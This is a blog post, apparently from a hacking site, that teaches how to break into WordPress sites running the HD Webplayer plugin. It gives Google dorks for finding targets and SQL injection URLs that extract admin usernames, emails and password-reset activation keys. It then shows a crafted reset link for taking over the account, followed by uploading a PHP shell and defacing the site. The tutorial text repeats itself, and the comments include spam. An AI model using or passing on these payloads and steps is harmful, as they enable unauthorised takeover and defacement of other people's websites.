As requested by few of you i decided to make this small tutorial on how to hack a wordpress site that has an SQLi in plugin.
watch this video tutorial for more help:
So lets begin.
I will use this 0day by JoinSeventh.
First of all we need to find a vulnerable page.
We enter this in Google:
When you found your site you need to find admin email and username.
I will be using this site for example:
When i add ' text disappears so it is vulnerable.
NOTE: I will not demonstrate how to SQL inject.
Now we need admin username and email.
We need to inject:
Now we have 2 users.
We pick one and copy his email.
Go to the login page of the site.
It is usually here:
And press "Lost your password?"
Now you enter either username or email.
We can enter both so it doesnt matter.
I entered email.
![[Image: regionby.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vr2W5rD_ut8CjdrogYvPsrHOoBp-VQEv_advhhRuGCk0ZIY65shNn9UCvLAQYgxr9PFIw8yxnn9MzUQO03LpApOWNm2vTpfr7L-gPS65_BzL7fhHpNm1w=s0-d)
![[Image: regionng.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u3iUjw4eRR5WR3ZufdKbtyuS9kevDA-SdZQaGNqYx8EViLcxjuYwvVPFX3qt6IZV9vHc-yy9l0r0DEO8scw1Cm_sLo-o3cq2bK7edvUbecr0k3wPfI=s0-d)
Now when you got:
"Check your e-mail for the confirmation link."
It means that reset key is successfully sent.
Now we need to get the activation key.
Go back to the syntax you used for extracting email and username and do this:
Voila!
Now we just need to reset it.
Go to:
NOTE: Replace key= & login=
So my link will be:
Enter new password:
Login with new password and shell it.
Download php shell
watch this video tutorial for more help:
I will use this 0day by JoinSeventh.
First of all we need to find a vulnerable page.
We enter this in Google:
Code:
# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"When you found your site you need to find admin email and username.
I will be using this site for example:
Code:
http://www.website.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3When i add ' text disappears so it is vulnerable.
NOTE: I will not demonstrate how to SQL inject.
Now we need admin username and email.
We need to inject:
Code:
http://www.
website .com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--Now we have 2 users.
We pick one and copy his email.
Go to the login page of the site.
It is usually here:
Code:
http://www.site.com/wp-login.phpAnd press "Lost your password?"
Now you enter either username or email.
We can enter both so it doesnt matter.
I entered email.
Now when you got:
"Check your e-mail for the confirmation link."
It means that reset key is successfully sent.
Now we need to get the activation key.
Go back to the syntax you used for extracting email and username and do this:
Code:
http://www.
website .com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Code:
http://www.
website .com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--Voila!
Now we just need to reset it.
Go to:
Code:
wp-login.php?action=rp&key=resetkey&login=usernameNOTE: Replace key= & login=
So my link will be:
Enter new password:
Login with new password and shell it.
Download php shell
Labels:
penetration testing,
Sql injections,
Website hacking
Previous Article
Responses
2 Respones to "How to hack wordpress website with Sqli vul.+ shell upload+ deface [video]"
hahahah That All Is Fake Bro IF U teching here hAcking then what happn as
meet me em i Innocents HAck3r Here
August 10, 2015 at 6:23 AM
Get the IIM edge in IFBS, New Delhi.Only B-School with faculty from India's premier B-Schools and an all IIM-A alumni management . Placement network across IITs and IIMs recorded highest avg.placement package in Delhi/NCR.
Banking PGDM Institute in Delhi
July 11, 2017 at 2:58 AM
Post a Comment